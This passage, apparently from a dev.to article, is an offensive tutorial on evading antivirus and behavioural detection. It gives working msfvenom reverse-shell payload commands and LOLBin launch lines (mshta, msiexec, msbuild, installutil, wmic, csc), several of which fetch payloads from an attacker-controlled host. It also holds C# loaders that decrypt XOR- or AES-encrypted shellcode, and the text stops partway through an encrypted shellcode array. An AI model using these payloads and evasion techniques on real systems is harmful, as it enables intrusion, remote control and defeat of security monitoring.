       &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;Main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
       &lt;span class="p"&gt;{&lt;/span&gt;
           &lt;span class="nf"&gt;GetShellMemAddr&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
       &lt;span class="p"&gt;}&lt;/span&gt;
   &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;msfvenom&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;windows/x64/exec&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;CMD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"cmd.exe -c calc.exe"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-f&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;csharp&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;Invoke-MMFml&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpnstcxx1406tdupz9cfu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpnstcxx1406tdupz9cfu.png" alt="Figure 10: MMFml PowerShell loader execution" width="716" height="69"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 10: MMFml PowerShell loader execution
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;I shall conclude the discussion on loaders at this point. It is highly recommended to develop custom loaders when possible, as they often yield superior evasion results.&lt;/p&gt;




&lt;h3&gt;
  
  
  B) Lolbins: Leveraging Trusted Binaries for Shellcode Loading
&lt;/h3&gt;

&lt;p&gt;Beyond the "cup and water" separation paradigm of loaders, I contend that &lt;strong&gt;Lolbins&lt;/strong&gt;—or whitelisted binaries—represent another significant category of separation-based evasion.&lt;/p&gt;

&lt;p&gt;These techniques are primarily designed to bypass &lt;strong&gt;behavioural detection&lt;/strong&gt;. For instance, when an application's execution context deviates from expected patterns—such as invoking specific &lt;strong&gt;APIs&lt;/strong&gt; that would not normally be called—such anomalous behaviour is readily detected. Whitelist-based exploitation circumvents these &lt;strong&gt;behavioural heuristics&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;It should be noted, however, that in some cases the shellcode or executable files employed in these techniques may still be written to disk, rendering them susceptible to signature-based detection. We shall address this aspect later in the article. Let us first examine the concept of whitelist exploitation.&lt;/p&gt;

&lt;p&gt;LOLBins, an acronym for "&lt;strong&gt;Living-Off-the-Land Binaries&lt;/strong&gt;", was originally conceived by Christopher Campbell and Matt Graeber at the DerbyCon security conference in 2013, with the term itself later coined by Philip Goh. In essence, these are trusted system binaries that can be repurposed for malicious activities. Consider the following examples:&lt;/p&gt;

&lt;h4&gt;
  
  
  DarkHydrus APT Sample
&lt;/h4&gt;

&lt;p&gt;MD5: B108412F1CDC0602D82D3E6B318DC634&lt;/p&gt;

&lt;p&gt;Launch command employed:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;cscript.exe&lt;/span&gt; &lt;span class="s2"&gt;"C:\Users\Public\Documents\OfficeUpdateService.vbs"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This example utilises &lt;code&gt;cscript&lt;/code&gt; to execute a VBS script that establishes persistence via a startup entry.&lt;/p&gt;

&lt;h4&gt;
  
  
  Mshta:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;payload:
msfvenom &lt;span class="nt"&gt;-a&lt;/span&gt; x86 &lt;span class="nt"&gt;--platform&lt;/span&gt; windows &lt;span class="nt"&gt;-p&lt;/span&gt; windows/meterpreter/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.134 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;53 &lt;span class="nt"&gt;-f&lt;/span&gt; raw &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; shellcode.bin

&lt;span class="nb"&gt;cat &lt;/span&gt;shellcode.bin |base64 &lt;span class="nt"&gt;-w&lt;/span&gt; 0

mshta.exe http://192.168.174.134 /qing.hta
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Template (replace shellcode at designated location):&lt;br&gt;
&lt;a href="https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta" rel="noopener noreferrer"&gt;https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta&lt;/a&gt;&lt;/p&gt;


  &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fc8nltcajane075bucshj.png" alt="Figure 11: CACTUSTORCH.hta shellcode replacement location" width="798" height="163"&gt;Figure 11: CACTUSTORCH.hta shellcode replacement location
  

&lt;h4&gt;
  
  
  Msiexec:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/x64/shell/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.134 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;4444 - f msi &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; qing.txt

C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\S&lt;/span&gt;ystem32&lt;span class="se"&gt;\m&lt;/span&gt;siexec.exe /q /i http://192.168.174.134 /qing.txt

&lt;span class="c"&gt;# Loading DLL:&lt;/span&gt;
msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/x64/shell/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.134 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;53 - f dll &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; qing.dll

msiexec /y C:&lt;span class="se"&gt;\q&lt;/span&gt;ing.dll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  Msbuild:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\m&lt;/span&gt;sbuild.exe qing.xml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Template (courtesy of 3gstudent):&lt;br&gt;
&lt;a href="https://github.com/3gstudent/msbuild-inline-task" rel="noopener noreferrer"&gt;https://github.com/3gstudent/msbuild-inline-task&lt;/a&gt;&lt;/p&gt;


  &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9sr4sjmpyzzydskuth27.png" alt="Figure 12: MSBuild inline task template" width="800" height="441"&gt;Figure 12: MSBuild inline task template
  

&lt;h4&gt;
  
  
  Installutil:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Compile:&lt;/span&gt;
C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\c&lt;/span&gt;sc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:qing.exe /keyfile:C:&lt;span class="se"&gt;\U&lt;/span&gt;sers&lt;span class="se"&gt;\J&lt;/span&gt;ohn&lt;span class="se"&gt;\D&lt;/span&gt;esktop&lt;span class="se"&gt;\i&lt;/span&gt;nstallutil.snk /unsafe C:&lt;span class="se"&gt;\U&lt;/span&gt;sers&lt;span class="se"&gt;\J&lt;/span&gt;ohn&lt;span class="se"&gt;\D&lt;/span&gt;esktop&lt;span class="se"&gt;\i&lt;/span&gt;nstallutil.cs

&lt;span class="c"&gt;# Execute:&lt;/span&gt;
C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\I&lt;/span&gt;nstallUtil.exe /logfile&lt;span class="o"&gt;=&lt;/span&gt; /LogToConsole&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;false&lt;/span&gt; /U qing.exe

&lt;span class="c"&gt;# Details:&lt;/span&gt;
https://www.blackhillsinfosec.com/how-to-bypass-application-whitelisting-av/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  Wmic:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;wmic os get /FORMAT:&lt;span class="s2"&gt;"http://example.com/evil.xsl"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Template:&lt;br&gt;
&lt;a href="https://raw.githubusercontent.com/kmkz/Sources/master/wmic-poc.xsl" rel="noopener noreferrer"&gt;https://raw.githubusercontent.com/kmkz/Sources/master/wmic-poc.xsl&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  Csc:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/x64/shell/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.132 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;53 - f csharp

C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework&lt;span class="se"&gt;\v&lt;/span&gt;2.0.50727&lt;span class="se"&gt;\c&lt;/span&gt;sc.exe /unsafe /platform:x86 /out:D:&lt;span class="se"&gt;\t&lt;/span&gt;est&lt;span class="se"&gt;\I&lt;/span&gt;nstallUtil-shell.exe D:&lt;span class="se"&gt;\t&lt;/span&gt;est&lt;span class="se"&gt;\I&lt;/span&gt;nstallUtil-ShellCode.cs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Subsequent execution can be performed via Installutil.&lt;/p&gt;



&lt;p&gt;I shall refrain from enumerating further whitelist exploitation techniques, as the underlying principle remains consistent across different binaries.&lt;/p&gt;

&lt;p&gt;A pertinent question arises: in certain scenarios, the executables or DLLs generated from our shellcode may still be &lt;strong&gt;written to disk&lt;/strong&gt; when employing these techniques.&lt;/p&gt;

&lt;p&gt;Although the aforementioned in-memory loading methods can mitigate this issue, what if &lt;strong&gt;file system persistence is a mandatory requirement&lt;/strong&gt;? How can one evade detection in such cases?&lt;/p&gt;

&lt;p&gt;This brings us to the second major category of evasion techniques: &lt;strong&gt;Obfuscation&lt;/strong&gt;.&lt;/p&gt;


&lt;h2&gt;
  
  
  0x02 Shellcode "Obfuscation" Evasion
&lt;/h2&gt;

&lt;p&gt;Is it possible to apply the same &lt;strong&gt;obfuscation, encryption, and fragmentation&lt;/strong&gt; techniques used for PHP web shells to shellcode?&lt;/p&gt;

&lt;p&gt;Let us begin with the simplest examples.&lt;/p&gt;
&lt;h3&gt;
  
  
  A) Shellcode Encoding Obfuscation
&lt;/h3&gt;

&lt;p&gt;After XOR-encrypting the shellcode, memory is allocated for execution—a process fundamentally similar to the shellcode execution method described at the beginning of this article.&lt;/p&gt;
&lt;h4&gt;
  
  
  C# XOR Example (ShellcodeWrapper):
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight csharp"&gt;&lt;code&gt;&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.IO&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Collections.Generic&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Text&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Threading.Tasks&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Security.Cryptography&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Runtime.InteropServices&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="nn"&gt;RunShellCode&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Program&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;//==============================================================================&lt;/span&gt;
        &lt;span class="c1"&gt;// CRYPTO FUNCTIONS&lt;/span&gt;
        &lt;span class="c1"&gt;//==============================================================================&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SubArray&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;(&lt;/span&gt;&lt;span class="k"&gt;this&lt;/span&gt; &lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
            &lt;span class="n"&gt;Array&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Copy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="nf"&gt;xor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;decrypted&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

            &lt;span class="k"&gt;for&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;++)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;decrypted&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;^&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="p"&gt;%&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;

            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;decrypted&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="c1"&gt;//--------------------------------------------------------------------------------------------------&lt;/span&gt;
        &lt;span class="c1"&gt;// Decrypts the given a plaintext message byte array with a given 128 bits key&lt;/span&gt;
        &lt;span class="c1"&gt;// Returns the unencrypted message&lt;/span&gt;
        &lt;span class="c1"&gt;//--------------------------------------------------------------------------------------------------&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="nf"&gt;aesDecrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;IV&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;SubArray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;16&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;encryptedMessage&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;SubArray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;16&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt; &lt;span class="m"&gt;16&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

            &lt;span class="c1"&gt;// Create an AesManaged object with the specified key and IV.&lt;/span&gt;
            &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AesManaged&lt;/span&gt; &lt;span class="n"&gt;aes&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nf"&gt;AesManaged&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Padding&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;PaddingMode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PKCS7&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;KeySize&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;128&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Key&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IV&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IV&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

                &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;MemoryStream&lt;/span&gt; &lt;span class="n"&gt;ms&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nf"&gt;MemoryStream&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
                &lt;span class="p"&gt;{&lt;/span&gt;
                    &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;CryptoStream&lt;/span&gt; &lt;span class="n"&gt;cs&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nf"&gt;CryptoStream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ms&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;CreateDecryptor&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="n"&gt;CryptoStreamMode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
                    &lt;span class="p"&gt;{&lt;/span&gt;
                        &lt;span class="n"&gt;cs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;encryptedMessage&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;encryptedMessage&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                    &lt;span class="p"&gt;}&lt;/span&gt;

                    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ms&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;ToArray&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
                &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="c1"&gt;//==============================================================================&lt;/span&gt;
        &lt;span class="c1"&gt;// MAIN FUNCTION&lt;/span&gt;
        &lt;span class="c1"&gt;//==============================================================================&lt;/span&gt;
        &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;Main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;encryptedShellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="m"&gt;0x8d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x81&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x67&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x71&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span 